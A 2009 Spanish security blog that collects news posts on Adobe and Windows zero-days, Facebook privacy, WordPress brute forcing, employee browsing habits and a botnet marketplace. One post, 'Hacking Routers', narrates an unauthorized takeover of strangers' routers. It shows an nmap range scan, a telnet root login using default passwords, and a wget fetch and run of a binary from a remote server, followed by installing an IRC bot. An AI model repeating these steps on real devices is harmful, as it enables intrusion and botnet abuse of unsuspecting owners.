jueves, 17 de diciembre de 2009

0 Day en Adobe Acrobat Reader

Bueno de nuevo tenemos otra vulnerabilidad 0 day en una aplicación muy conocida y utilizada por muchos usuarios, Adobe Acrobat Reader.

La gente de Adobe no ganan para sustos y es que dicho bug es incluso indetectable por las mejores soluciones antivirus (aunque se espera que esto cambie en breve) la vulnerabilidad identificada como CVE-2009-4324 es critica y por ello se han publicado unos consejos para paliar en la medida de lo posible este agujero hasta que este disponible el parche que resuelva el problema que segun Adobe sera el 12 de Enero.

¿Como protegernos?

Una de las opciones para protegernos mientras llega el día D seria esta aplicación Acrobat JavaScript Blacklist Framework que descarga un par de archivos que modifican el registro. Otra opción viable seria el desactivar Javascript del propio Acrobat Reader desde Editar--Preferencias--Javascript, por supuesto el utilizar el Addons Noscript para los usuarios de Firefox no viene nada mal para esta situación en cuestión y para muchas otras , en fin que como veis podemos protegernos mientras llega el ansiado día 12 de Enero. Por ultimo podemos elegir por desinstalar directamente la aplicación de Adobe e instalar otro lector de archivos PDF como por ejemplo los que aparecen en esta web.

Para mas información sobre esta vulnerabilidad critica Adobe a puesto a disposición de los usuarios esta pagina blog PSIRT desde donde la cual podremos seguir las evoluciones del bug que afecta actualmente a Adobe Acrobat Reader.

Fuente: Hackdosx

domingo, 13 de diciembre de 2009

Facebook cambia las opciones de privacidad.

En las últimas semanas los usuarios de Facebook han sido notificados, por parte del fundador de esta red social, de la llegada de los nuevos cambios que ya se están aplicando. En el apartado más importante, la privacidad, los cambios no han sido drásticos pero sí lo suficientemente importantes para informaros de ellos y que, cuando aparezca la notificación, sepáis qué opciones tenéis y queréis personalizar.

La red social Facebook dispone desde el pasado miércoles de un nuevo modelo para el control de la privacidad. La finalidad de estos cambios pasa por darles a los usuarios más control sobre la información que comparten, sin que por ello deje de ser sencillo el encontrar y conectar con amigos.

Facebook ha simplificado la página de privacidad y ha añadido la posibilidad de elegir el nivel de privacidad de todo el contenido que se publica, desde las actualizaciones de estado hasta las fotos.

Al mismo tiempo, también hay que destacar que se ha potenciado la búsqueda de contactos y la posibilidad de difundir las publicaciones a una audiencia más amplia, ya que además de hacer visible públicamente una serie de datos sobre cada usuario, a partir de ahora, Google incorpora en sus resultados de búsqueda el contenido generado en las redes sociales.

A partir de ahora se podrá personalizar quién nos puede encontrar a través del buscador del propio Facebook, estableciendo las conocidas opciones “solo mis amigos”, “amigos de amigos” o “todos”. Por otro lado, las opciones no permiten la posibilidad de no aparecer en este buscador, que sería lo más recomendable.

La red social también ha querido velar por la privacidad de los menores, por lo que controlará la difusión de contenido creado por usuarios menores de 18 años, los cuales no podrán poner su información a disposición de todos.

Qué implican estos cambios

  • Se puede escoger la configuración de privacidad de todo lo que se publica con una nueva herramienta llamada "control de privacidad de la edición". Para este fin se ofrecerán cuatro opciones de redes con las que compartir los contenidos: “amigos”, “amigos de amigos”, “todos” o “personalizar”.
  • Ahora, para facilitar la búsqueda de amigos, una serie de datos sobre todos los usuarios es visible públicamente, como el nombre, la foto del perfil, el sexo, las redes a las que se pertenece, la lista de amigos y las páginas de las que se es fan.
  • Los sitios web y aplicaciones de terceros compatibles con Facebook tienen acceso a un conjunto limitado de datos sobre el usuario: su información pública y la información para la que haya elegido la configuración de privacidad "Todos".
  • Hasta que no cumplan los dieciocho años, la información de los menores de edad estará restringida a los amigos de sus amigos y a sus redes.
Desde ayer, los usuarios que inicien sesión en la red social serán notificados mediante una ventana emergente de las modificaciones realizadas, y asistidos mediante una herramienta de transición para que elijan sus nuevas opciones de configuración.

Es posible obtener mucha más información sobre este nuevo enfoque en lanueva página de privacidad de Facebook . Como ayuda para comprender estos cambios, desde la propia página también se puede utilizar una herramienta que ejemplifica la información del perfil que puede verse por amigos o que es pública para todos.
Todos estos cambios aportan más facilidad para configurar las opciones de privacidad y a la vez una mayor responsabilidad del usuario a la hora de ser consciente de la información que publica y quiénes van a verla.

Fuente: http://cert.inteco.es/

martes, 1 de diciembre de 2009

WordPress bajo ataques de fuerza bruta

Está sucediendo un ataque contra algunas implementaciones de WordPress que están intentando hallar por ataque de fuerza bruta la contraseña de los administradores de las instalaciones. El ataque está siendo llevado a cabo por un script automatizado de PHP que intenta miles de posibles contraseñas.

El Centro de Tormentas de Internet SANS (ISC )ha publicado un análisis del script de ataque a WordPress, que fue encontrado en un servidor virtual privado. El script tiene la capacidad adicional de permitir que un atacante lo ejecute en un número de servidores diferentes al mismo tiempo, ya que las contraseñas que intenta están almacenadas en una base de datos MySQL que puede ser accedida remotamente.

La funcion wp_brute_attempt() toma 3 parámetros, $ch que es la estuctura cURL (cURL es una herramienta de línea de comando que se puede usar para realizar peticiones HTTP ). Los otros dos parámetros definen el sitio y la contraseña que se intentará. Si el script consigue validarse exitosamente, la página que es devuelta por el servidor contendrá la frase "Log Out", y la función devolverá el valor verdadero.

Ahora, lo interesante del script es que permite el cracking distribuido. La información es guardada en una base de datos MySQL y el script realmente se conecta en forma directa a la base de datos principal. Esto permite al atacante correr varios scripts simultáneos - cada uno de ellos tomará 200 URL nuevas y las marcará con el ID del script forzador ($colo)

Se ha hallado en los últimos meses que WordPress, una plataforma de blogging popular, tiene una serie de vulnerabildades y los ataques contra la plataforma se han vuelto comunes. WordPress es usado en muchos entornos de blogging en corporaciones y también es usada por millones de bloggers individuales.

Fuente: http://www.segu-info.com.ar/

jueves, 26 de noviembre de 2009

Hacking Routers (El agujero de seguridad del usuario domestico)

En este artículo voy a hacer una descripción de cómo llegué a tomar el control absoluto de varios cientos de pequeños equipos conectados a la red de redes, describiré el porqué es una amenaza mundial y vaticinaré que el futuro del hacking irá por este camino. Pero lo más inquietante será que cualquiera con un poco de suerte puede repetir lo mismo que yo hice.

Prólogo


Bien, hace algunos años, aquellos que empezábamos con internet contratábamos nuestra linea de 56k con un ruidoso y chirriante modem. Poco después, vino el ADSL, trayendo vertiginosas velocidades de 1mb. Pero en todo esto había una gran amenenaza que las compañías telefónicas no vieron: cualquiera en su casa podía montar un pequeño servidor. Es cierto que las velocidades de subida no podían dar pie a grandes servicios, pero sí eran lo suficientemente grandes como para abrir un puerto a la escucha y poner una shell remota. En cualquier momento, un atacante podría escanear un rango de IPs y cuando detectara cierto puerto abierto era sinónimo de que estaba infectado con el famoso troyano, tomando el control absoluto del ordenador. Era la época del famoso SubSeven.

De cómo SubSeven cayó en el olvido


A medida que pasaba el tiempo, al abaratarse los equipos informáticos, los usuarios comenzaron a adquirir más ordenadores. Pero el problema era que con los antiguos modem tan solo se podia conectar uno a internet, y en caso de querer encufar más máquinas a la red, hacía falta un engorroso proceso. Fue entonces cuando la gente comenzó a comprar routers, hubs ethernet que permitían comunicar cuatro o más equipos con el mundo exterior. Esta práctica se popularizó, hasta que las propias compañías proveedoras de servicios proporcionaban equipos híbridos módem-router, que son los que conocemos ahora.

Al utilizar un router, los paquetes que llegan de fuera deben decidir el camino a tomar, porque si hay cuatro ordenadores en la red interna peude ser un auténtico lío. Para eso necesita tablas de enrutamiento. Y si uno quiere conectarse a un ordenador, antes tiene que dar cuentas al router, que debe de estar correctamente configurado para que cuando le decimos "router, conéctame con la máquina x en el puerto 80", este nos lleve efectivamente a la máquina x en el puerto 80. Por defecto, todos los puertos en los routers están desenrutados, por lo que, a menos que se abran manualmente, este aparatito cuadrado hará oídos sordos de cualquier requerimiento de conexión. El SubSeven había muerto.

Máquinas de pocas palabras


Los troyanos de conexión directa ya no eran útiles, pero nunca se cierra una puerta sin que se abra una ventana. Para configurar el router, ciertamente, hacía falta una interfaz. Para ello, estos quedaban a la escucha con un servidor HTTP detrás, y cuando un usuario lo requiriera, ya fuese desde la red local o desde el exterior, el aparato te permitía configurarlo correctamente, siempre y cuando supieras el santo y seña. Y he aquí el quid de la cuestión, la contraseña en casi todos los casos era la misma que traía de fábrica. El 90% de los usuarios no la habrían cambiado, tal vez ni siquiera sabría qué coño es eso. Probando cosas como "admin", "root", "password", "1234"... cualquier atacando sin nada mejor que hacer podía tomar control absoluto de tus tablas de erutamiento.

Pero claro, siempre habían usuarios avispados, que la cambiaban con presteza. El problema ahora era que los routers domésticos antiguos no te permitían, en el mejor de los casos, exceder los seis carácteres. Así que un atancante un poco más mañoso, con una sencilla herramienta que probase todas las combinaciones, si se le metía en los cojones acababa accediendo a las enrutadas tripas del engendro.

Sofisticación VS Seguridad


Internet creció, las páginas se hicieron más pesadas, el streamming de audio y video provocaban auténticos trombos de datos, y es por eso que el bando de ancha creció, y con el la velocidad de acceso del usuario medio. Para manejar tremenda cantidad de datos, los routers tenían que ser más sofisticados, y sus pequeños ordenadores emebebidos más potentes. Los software de configuración cambiaron, y ahora tambien ofrecían configuración por FTP, telnet, SSH, HTTPS y el antiguo HTTP. Todo muy bonito y configurable, pero esto entraña otro riesgo: a más servicios, más puertos abiertos. Y a más puertos, hace falta un sistema más grande y estable. Y a más grande sea el sistema, más código tiene. Y a más código tiene, más bugs posee. Si a esto sumamos que el usuario sigue sin cambiar la contraseña en sus bonitos routers, tenemos el sueño de cualquier piratilla informático.

Idea general del ataque

Desde hace unos pocos años, si un router tiene abiertos los puertos 22 o 23 (SSH y telnet), significará que no solo tiene un pequeño interfaz de configuración, si no un pequeño linux embebido. Muchas marcas de routers los tienen. Si nos conseguimos colar como usuario root el sistema se verá seriamente comprometido. Y si una vez estamos dentro como root, subimos e instalamos un programita que a su vez escanee la red en busca de más equipos vulnerables, tendríamos un gusano peligrosísimo. Y no solo eso: ¿porqué no montar un servidor HTTP, FTP o incluso IRC? Las máquinas tienen un pequeño disco duro, y pocos recursos, pero si yo quiero distribuir material ilegal podría se runa buena opción. Además, casi todos los routers cuentan con un servicio de actualización de DNS dinámico, como DynDNS o No-IP. Con una dirección fija, ya tendríamos un server en toda regla.

El sueño de todo hacker es obtener root en un servidor. Esto te da control absoluto. Pero si además eres indetectable por parte del usuario (si este deja la contraseña que trae el router por defeto, ¿va a explorar quien puede estar en su sistema?) y por los firewalls y antivirus, estamos ante una utopía.

Comenzando el asalto


En este ejemplo, que es totalmente real, no daré detalles como IPs, o rangos de IP's donde se pueden encontrar equipos vulnerables, ni de compañías que instalan este tipo de routers o de países. Eso sería una irresponsabilidad por mi parte, y se aleja del objetivo didáctico de este artículo. Tan solo diré que es bastante común encontrar un router vulnerable.

Bien, lo primero es hacerse con las herramientas necesarias. Nuestro objetivo es arbitrario, o sea, que nos da igual quien sea. Por ello vamos a adquirir la último versión del nmap, un gran programa, de su correspondiente web: http://www.insecure.org. Una vez lo tenemos, tanto en Windows como en Linux, vamos a escanear el rango de IPs donde puede haber una vulnerabilidad:

Código:

nmap -v -v -T4 -F 0.1.2.*


Esto escanería los 255 hosts de esa IP. Nótese que esta es poco menos que ficticia.

Tras un ratito escaneando, el nmap nos debería escupir algunos resultados. Yo, para este ejemplo, me he fijado en este:

Código:

Host dslxxx.xxx.xxx.xxx.xx (xxx.xxx.xxx.130) is up (0.14s latency).
Scanned at 2009-xx-xx xx:x4:35 Romance Standard Time for 91s
Interesting ports on dslxxx.xxx.xxx.xxx.xx (xxx.xxx.xxx.130):
Not shown: 91 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp filtered smtp
80/tcp open http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
1723/tcp filtered pptp


Seguramente se trata de un bonito router con una bonita cantidad de puertos abiertos: FTP, SSH, telnet y HTTP. Sin perder más tiempo, abro una línea de comandos (estoy en Windows) y le hago un rápido telnet:

Código:

C:\>telnet xxx.xxx.xxx.130
Connecting To xxx.xxx.xxx.130...

BusyBox on localhost login:


¡Bingo! Tenemos un login por telnet. De igual forma podría ser por SSH, pero bueno, telnet viene a ser los mismo. Veo una palabra clave: "BusyBox". Un rápido googleo me informa de que es un minilinux para sistemas embebidos. Me pide el login, y como yo quiero ser "root", pongo root. Entonces me pide la contraseña. Pruebo varias, como root, admin, 1234, en blanco, password, pass... tras algunos intentos, lo consigo (no diré la verdadera):

Código:


BusyBox on localhost login: root
Password:


BusyBox v0.61.pre (2006.09.25-12:57+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

#


La ostia. A la primera. Estoy como root en un sistema remoto que no actualizan desde el 25 de septiembre de 2006. Esto debe de ser el paraíso. Hago un par de comandos para tantear donde estoy metido:

Código:

# whoami
root
# ls
bin etc proc usr var.tar
dev lib sbin var
# help

Built-in commands:
-------------------
. : bg break builtin cd chdir continue eval exec exit export
false fc fg hash help jobs kill local pwd read readonly return
set setvar shift times trap true type ulimit umask unset wait

# busybox
BusyBox v0.61.pre (2006.09.25-12:57+0000) multi-call binary

Usage: busybox [function] [arguments]...
or: [function] [arguments]...

BusyBox is a multi-call binary that combines many common Unix
utilities into a single executable. Most people will create a
link to busybox for each function they wish to use, and BusyBox
will act like whatever it was invoked as.

Currently defined functions:
[, ash, busybox, cat, chgrp, chmod, chown, cp, cut, dd, df, echo,
false, free, grep, hostname, id, ifconfig, init, insmod, kill,
ln, login, ls, lsmod, mkdir, modprobe, mount, mv, passwd, ping,
ps, pwd, reboot, rm, rmmod, route, sh, sleep, sync, tar, test,
tftp, touch, true, tty, umount, wget, whoami, yes

#


Como pueden ver, esoy en el directorio / de un sistema Linux como usuario "root". Vamos a echar un vistazo alrededor:

Código:

# cd proc
# ls
1 4 avalanche iomem misc sysvipc
102 41 bus ioports modules ticfg
111 5 cmdline kcore mounts tty
1586 6 cpuinfo kmsg mtd tzval
1587 676 devices ksyms net uptime
1591 7 dma led_mod partitions version
2 73 driver loadavg self wlan
3 75 execdomains locks slabinfo
319 76 filesystems meminfo stat
361 98 fs mii_read swaps
377 99 interrupts mii_write sys
# cat version
Linux version 2.4.17_mvl21-malta-mips_fp_le (beri@debian) (gcc version 2.95.3 20
010315 (release/MontaVista)) #1 Mon Sep 25 15:52:29 EEST 2006
# cat cpuinfo
processor : 0
cpu model : MIPS 4KEc V4.8
BogoMIPS : 211.35
wait instruction : no
microsecond timers : yes
extra interrupt vector : yes
hardware watchpoint : yes
VCED exceptions : not available
VCEI exceptions : not available
#


Con esto obtenemos un poco más de información. La versión del kernel es bastante antigua (2.4.17), compilada para un procesador MIPS de 4K. ¿Quien necesita más? ¿No es esto suficiente para hacer maldades? Y lo mejor esque ni siquiera necesito ejecutar un exploit que me permita ser root. Ya lo soy.

Bueno, llegados a este punto, no se puede perder el tiempo. Veo que dispongo del comando wget:

Código:

# wget
BusyBox v0.61.pre (2006.09.25-12:57+0000) multi-call binary

Usage: wget [-c|--continue] [-q|--quiet] [-O|--output-document file]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR] url

#


Por lo que podré obtener cositas de internet.

Me voy a disponer a compilar un simple "Hola Mundo". El código sería el siguiente:

Código:

#include

int main()
{
printf("Hello world.");
}


Me voy a mi otro ordenador, donde tengo Linux, e intento compilarlo. Rápidamente caigo en la cuenta de que necesito un compilador para MIPS. Después de buscar un poco en google descargo este, ya compilado: http://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2. Habrán muchos otros, pero este fue el primero que encontré. Puede que también les sirva. No entraré en detalles, los compilé y lo subí a un servidor FTP gratuito. De nuevo en mi router rooteado, hago:

Código:

# cd var/tmp
# wget http://xxx.ftpserver.com/hello
Set PR mark for socket 0x6 = 239
hello 100% |*****************************| 5551 00:00 ETA
# chmod +x hello
# ./hello
Hello world.#


Fue en este momento cuando sentí un cosquilleo en la boca del estómago. Cogí de internet un ejemplo de bot IRC en C, lo ajusté, corregí un poco el código, lo compilé, lo subí, lo ejecuté y vi con admiración como se conectaba a mi servidor IRC desde un lugar remoto del mundo, completamente a mis órdenes. Podría haberle puesto un comando para que buscase mas equipos vulnerables, con un mini logeador por telnet a fuerza bruta y otro comando para inicar un básico DDoS. No hice nada maligno, pero de querer haberlo hecho, ¿quién iba a impedírmelo? Y es más, de haberlo hecho, ¿quién me iba a descubrir?

Conclusiones


El ejemplo que he descrito se trata de un serio problema de seguridad mundial. Cualquier atacante malintencionado podría instalar bots IRC para hacer ataques DDoS, proxies completamente anónimos, servidores de cualquier tipo, etc. Es cierto que los routers son muy poco potentes, pero el poder dispones de 1000, 2000 o 10000 pequeñas máquinas indetectables, por muy poco potentes que sean, y por muy poco ancho de banda del que dispongan, son una seria amenaza.

Con este artículo no estoy incitando al crimen, más bien todo lo contrario. Intento fomentar el uso de claves seguras, y la responsabilidad del ISP de mantener a sus clientes a su propia red fuera de peligro.

Espero que el ejemplo quede claro. Como dije antes, con el tiempo, los routers serán cada vez más complejos y esto no ha hecho más que empezar. El futuro del hacking, a mi modo de ver, irá por este camino. Esperemos que le encuentren solución rápidamente.

Fuente original: http://www.descifra.me

jueves, 12 de noviembre de 2009

¿Que habitos de navegacion tienen los empleados de una empresa?

Un informe revela cuáles son los hábitos y las actividades que realiza el personal en la Red desde las computadoras corporativas y los controles que efectúan los gerentes informáticos y de tecnología de las compañías argentinas.

Una conducta unifica a gerentes y empleados de empresas grandes y medianas de América latina, en especial la Argentina: tanto a niveles de conducción como trabajadores utilizan su computadora para navegar por sitios web que no tienen relación con su actividad laboral en horas de oficina.

Las grandes compañías locales permiten que su personal tenga acceso a Internet en comparación con firmas de otros países, como Brasil, la nación que más bloquea el acceso a ciertos sitios a sus empleados.



Pero lo que más duele a los encargados de sistemas es que el 72% de los usuarios admitieron que realizaron al menos una actividad que puso en riesgo la seguridad.

Estos datos provienen de una encuesta sobre el uso de Internet en empresas de América latina, al cual accedió iProfesional.com, que revela cuáles son los nuevos hábitos de navegación de los empleados de una organización.

El estudio, realizado por la empresa de seguridad informática Websense, abarcó gerentes de tecnología y empleados de las principales compañías en la Argentina, Brasil, Chile, Colombia, México, Perú y América Central sobre el uso que los trabajadores hacen de Internet cuando están en la oficina y sobre cómo sus hábitos de navegación influyen en la seguridad informática de las organizaciones.

El estudio -encargado por Websense a la firma DMS- realizado entre 700 personas (350 gerentes de tecnología y 350 empleados) de empresas con más de 250 empleados en todos los segmentos de la industria en latinoamérica, reflejó que todos los encuestados, tanto los gerentes como el personal, utilizan su computadora para navegar por páginas no relacionadas con su actividad laboral en horas de oficina.

En la Argentina el 96% de los encuestados dijo acceder a correo personal en horario laboral.

El 27% de los gerentes ofrece a los usuarios acceso a sitios web 2.0 a pesar de entender que estos sitios no son necesarios para su negocio. Por su parte, el 21% bloquea el acceso a estos sitios.

Según el estudio, entre los números 1 del área tecnológica que consideran a la Web 2.0 como una herramienta necesaria para sus negocios, el 21% dijo que no es un problema, mientras que el 20% de ellos piensa que es una pesadilla de administrar.

Además, la mayoría de empresas en América latina permiten que sus empleados tengan acceso a ciertas categorías de sitios. Los más utilizados son portales web como iGoogle (89%) y servicios de correo electrónico como Hotmail, Yahoo, Gmail, etc. (76%).

Los sitios considerados como web 2.0 por los gerentes TI son principalmente redes sociales, tanto para negocios (67%) como para uso personal (48%), y portales web como iGoogle (61%).

Tiempo invertido

La encuesta reveló que los gerentes de tecnología creen que los trabajadores consumen 89 minutos diarios para navegar por Internet para asuntos personales.

Sin embargo, los usuarios admiten que navegan hasta 50 minutos diarios en asuntos diferentes a su actividad laboral.

Las grandes empresas en la Argentina permiten que sus empleados tengan acceso a Internet si se las compara con compañías de otros países. Brasil, en cambio, es la nación que más bloquea el acceso a ciertos sitios a sus empleados.

Actividades riesgosas

El comportamiento en línea de los trabajadores sigue siendo una gran preocupación para casi todos los encargados de TI (un 98%), ya que más del 72% de los usuarios admitieron que han realizado al menos una actividad que puso en riesgo la seguridad.

La actividad en línea que más temor causa entre los directores es el envío de documentos de la oficina hacia cuentas de correo electrónico personal de los miembros de la organización.

Mientras tanto el 71% de los ejecutivos tecnológicos piensan que ésta es la actividad con mayores riesgos, el 46% de los empleados encuestados afirmó realizarla habitualmente.

En comparación con los últimos años, los gerentes de TI están ahora menos preocupados por aquellos trabajadores que permiten que un familiar o amigo utilice la computadora de la oficina para propósitos personales. Es así como esta tasa ha disminuido considerablemente de 56% en 2007, al 20% en 2008 y al 15% en 2009.

En la Argentina, el 30% de las grandes empresas tienen un 20% de sus computadoras infectadas con software espía y el 58% de los gerentes creen que podrían perder sus puestos de trabajo si se fuga de la empresa información confidencial a través de Internet.

Sin embargo, un 66% de los ejecutivos de TI encuestados son los más preocupados porque la seguridad tecnológica no ocupa un lugar suficientemente alto en la agenda corporativa.

Direcciones equivocadas

Otra situación que causa temor entre los encargados informáticos es el envío de mensajes electrónicos a direcciones equivocadas, lo cual propicia la fuga de información interna confidencial. Para 2009, la encuesta Web@Work reveló que esta práctica ha aumentado a un 56%, frente al 20% reportado en 2008.
La mensajería instantánea sigue siendo un dolor de cabeza para los gerentes de tecnología, quienes piensan que el 61% de los empleados la realizan durante horas de oficina.

Aunque el 87% de los empleados consultados dijeron que utilizan la mensajería instantánea para fines laborales, el 12% admitió que la usa para propósitos personales.

Un resultado destacado es el de las conexiones inalámbricas mediante computadoras portátiles de la empresa. El 37% de los consultados utilizan este tipo de conexión cuando viajan o trabajan de forma remota.

Actividades personales

Según la encuesta, las visitas a sitios web no relacionados con la actividad laboral se incrementaron en comparación con los resultados de 2008. En general, el acceso a páginas web que no tienen vínculo con el trabajo es una práctica común entre el 99% de los empleados consultados.

De forma similar, el 72% de los empleados tienen el hábito de visitar cinco o más páginas web de carácter personal. Por su parte, el 100% de los gerentes creen que el personal tiene este tipo de comportamiento.

Las páginas web más visitadas por los empleados son:
  • Noticias y medios de comunicación (85%)
  • Bancos y empresas financieras (79%)
  • Sitios de gobierno (75%)
A pesar de algunas diferencias, (94%, 92% y 91%, respectivamente), los gerentes TI tienen una percepción correcta de los sitios web más visitados por los empleados. El acceso a sitios bancarios y financieros fue el de preferencia por los argentinos encuestados.

Percepciones

El 96% de los encargados informáticos confían en que sus empresas están protegidas de alguna forma contra las amenazas de seguridad de Internet, aunque muy pocos (sólo el 4%) cree que su compañía lo está en forma total.

Los trabajadores, por su parte, tienen una percepción muy diferente sobre la protección de la empresa. A pesar de que la tasa ha disminuido, la mayoría de ellos creen estar más seguros de la protección que les brinda la computadora de su oficina.

El registro del nivel de protección TI es significativamente diferente entre todos los países investigados ya que por ejemplo, sólo el 42% de los empleados brasileños dicen estar seguros de tener una protección total, mientras que en México el 70% opina lo mismo.

En términos generales, parece que las empresas más grandes están preocupadas por el tema de la seguridad en Internet, ya que el porcentaje de uso de software específico para contrarrestar los riesgos de seguridad ha aumentado considerablemente en los últimos años.

Además de los firewall (cortafuegos) y antivirus, el 99% de las grandes compañías en América latina tiene por lo menos un tipo adicional de software específico de seguridad de Internet.

Las aplicaciones más comunes son las soluciones de filtro de Internet (91%) y los utilizados para el bloqueo de sitios de phishing (89%).

Empleo en riesgo

Casi todos los entrevistados (95% de los gerentes TI y 93% de los empleados) creen que realizar actividades de riesgo en Internet puede ocasionar la pérdida de su empleo.

Ambos, jerárquicos y trabajadores, tienen la percepción de que sus empresas están tomando más en serio la seguridad de Internet y, por eso, creen que pueden perder su empleo si es sorprendido practicando cualquier actividad de Internet que represente un riesgo.

Según los empleados, la acción más arriesgada es filtrar información confidencial de la empresa, que tuvo casi el mismo promedio del año pasado (pasó de 90% en 2008 a 91% en 2009), seguido por infectar a su empresa con spyware malicioso o un virus, el cual aumentó del 73% al 83%.

La principal preocupación de los gerentes de tecnología es que el personal filtre información confidencial (82%), seguida de la introducción de virus que puedan afectar los procesos de negocio (71%).

Las compañías en la Argentina se preocupan menos por la seguridad de Internet, ya que el 12% de los gerentes TI no perciben práctica en línea de su personal que ponga en peligro su empleo.

El 22% de los ejecutivos argentinos encuestados no pudo asegurar que su firma utilizará un software de filtrado de Internet y el 56% de los Gerentes de TI dicen que la web 2.0 no es necesario para su negocio y, sin embargo, el 68% de ellos dan a los usuarios el acceso a ella.

Fuente: http://tecnologia.infobaeprofesional.com/notas/90003-Que-hacen-los-empleados-cuando-navegan-por-Internet-en-la-empresa.html

sábado, 10 de octubre de 2009

Vulneravilidad 0 day en Adobe Reader y Acrobat

Se ha publicado un anuncio oficial de Adobe que informa sobre la existencia de un grave problema de seguridad que permite a un atacante remoto ejecutar código arbitrario a través de vectores no especificados. El fallo está siendo aprovechado activamente por atacantes.

Los productos afectados son Reader y Acrobat en las versiones 9.x y 8.x para Windows, Macintosh y UNIX y en las versiones 7.x en sistemas Windows y Macintosh.

Adobe ya ha anunciado que el CVE asignado será CVE-2009-3459 y que este error será solucionado en su siguiente boletín trimestral de actualizaciones que se espera para el 13 de este mes.

Se recomienda desactivar JavaScript en los documentos PDF para mitigar en la medida de lo posible los ataques y si se tiene Windows Vista con la versión 9.1.3, activar el sistema DEP (Prevención de ejecución de datos) puesto que aprovecha esta característica del sistema operativo.

Recomendamos, si es posible, usar otro lector de archivos PDF hasta que se solucione el fallo. Aunque no estén exentos de contener problemas de seguridad, al menos por ahora no son objetivo claro de atacantes. Hay un buen puñado donde elegir para todas las plataformas en:
http://pdfreaders.org/

Fuente: http://www.hispasec.com/

jueves, 1 de octubre de 2009

Curso Completo de Metasploit Framework

Al parecer los creadores de Backtrack han liberado totalmente gratis el mejor manual y mas completo que he visto del Metasploit Framework, este excelente herramienta para desarrollar y ejecutar exploits.

La guía cubre desde los aspectos mas básicos que debes tener en cuenta a la hora de ejecutar Metasploit, como los requerimientos de tu maquina, pasando por su instalación, hasta tocar temas como la interacción con la herramienta, como programar sobre ella y como ejecutar tu propio exploit programado con este framework.

Para acceder a este curso de Metasploit Framework, solo es necesario contar con un navegador, internet y leer un poco de ingles técnico.

martes, 18 de agosto de 2009

¿Keygen falsos?

Me llamó la atención el título de un post en el blog Spamloco titulado "Cuidado con los Keygen falsos de Windows 7", encontré interesante el hallazgo y la descripción de este nuevo engaño. Luego de lo cual me surgieron algunas preguntas:

¿Hace falta explicar que no hay keygen 'auténticos'?

¿Hace falta explicar que un keygen es algo peligroso?

¿Hace falta explicar que los keygen están diseñados para robar el derecho de uso de programas pagos?

¿Hace falta recordar y explicar que hoy día es muy raro que un keygen no contenga malware?

Y si, hace falta recordarlo: ¡Cuidado con los keygen!

Por si alguien aun no sabe que es un keygen: es un programa diseñado para generar números de serie de activación de programas pagos con el fin de usar ese programa sin pagar. Es piratería.

Los 'inteligentes' programadores que los crean, son del mismo tipo de los que programan software y malware para los delincuentes cibernéticos. Lo hacen por dinero.

Pero ¿cómo consiguen dinero escribiendo un programa keygen? Sencillo, incluyen en el keygen algún troyano o malware para infectar la PC y que pase a ser parte de alguna red bot. De allí en adelante es un 'recurso' más de los delincuentes que operan esas redes.

Usar un keygen hoy en día es algo estúpido que se paga con la infección del equipo y con nuestra información en manos de delincuentes.

Fuente: http://blog.segu-info.com.ar/

lunes, 6 de julio de 2009

0 day en la librería msvidctl.dll de Microsoft Windows

Malos momentos para Microsoft. Se acaba de detectar un nuevo 0 day en Windows que está siendo aprovechado activamente. Microsoft no ha reconocido todavía el fallo, pues ha sido "destapado" por terceras partes. El exploit es público, y parece que (como viene siendo habitual) muchas páginas legítimas comprometidas están sirviendo para infectar los sistemas.

El fallo en cuestión es un desbordamiento de memoria intermedia basado en pila en la función 'MPEG2TuneRequest' de la librería msvidctl.dll. Un atacante remoto podría aprovechar esto para ejecutar código arbitrario con los permisos del usuario bajo el que se ejecuta el navegador.

La única contramedida disponible es la activación del kill bit del control. Es posible hacerlo guardando este archivo con extensión .reg y ejecutarlo como administrador:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\
ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

No se ha confirmado aún a qué versiones de Windows en concreto afecta. La detección del JavaScript que explota el fallo es bastante pobre todavía. Según VirusTotal, solo McAfee, AntiVir, VirusBuster y Microsoft lo reconocen (recordando siempre que esto puede cambiar en un entorno de escritorio). El ejecutable que descarga sí tiene un mejor ratio de detección.

Malos momentos para Microsoft, puesto que acumula dos 0 day sin solución por ahora. A finales de mayo Microsoft reconocía un problema de ejecución de código explotable a través de archivos de QuickTime. En el posterior ciclo de actualizaciones de junio, no solucionó el problema, y tampoco parece que vaya a sacar un parche fuera de ciclo. La diferencia con este nuevo 0 day en msvidct.dll es que en aquel caso, no había información pública sobre cómo aprovecharlo. Esto hace mucho más peligroso este nuevo problema y sin duda hará que Microsoft actúe con mayor celeridad.

Fuente: http://www.hispasec.com/unaaldia/3907/day-libreria-msvidctldll-microsoft-windows

viernes, 26 de junio de 2009

Descubren un sitio web para alquilar ordenadores comprometidos

Expertos en seguridad han descubierto un sitio web donde los cibercriminales pueden comprar y vender todo tipo de herramientas para cometer delitos en Internet.
  1. El portal, llamado GoldenCashWorld, se describe a sí mismo como “la empresa que ha ganado la mayor parte del mercado, pero no en público”. Es posible que los delincuentes a cargo del portal, que manejan el sitio desde Rusia, sean miembros de la conocida banda de cibercriminales Russian Business Network.

Entre otras cosas, los visitantes de GoldenCashWorld pueden alquilar redes zombi. El sitio también contiene herramientas para crear códigos maliciosos y alrededor de 100.000 credenciales FTP de sitios web comprometidos.

Los delincuentes interesados pueden contratar los servicios de 1.000 ordenadores infectados por entre $5 y $100. Por lo general, los criminales utilizan estos equipos para enviar spam, lanzar ataques de negación de servicio y estafar a usuarios de Internet.

Los ordenadores comprometidos de Estados Unidos y el oeste de Europa son los más preciados y costosos, y alrededor del 40% de los equipos infectados son de usuarios estadounidenses.

Además, los operadores del sitio se han esforzado en proteger el portal para mantener alejados a visitantes indeseados. Para evitar que las empresas de seguridad descubrieran su negocio ilegítimo, los delincuentes crearon una larga lista negra de direcciones IP que mantenía alejadas a empresas como Microsoft, Google, Kaspersky Lab, BitDefender y Cyveillance, entre otras.

Además, escondieron su portal entre varios servidores proxy para camuflar la verdadera dirección del sitio.

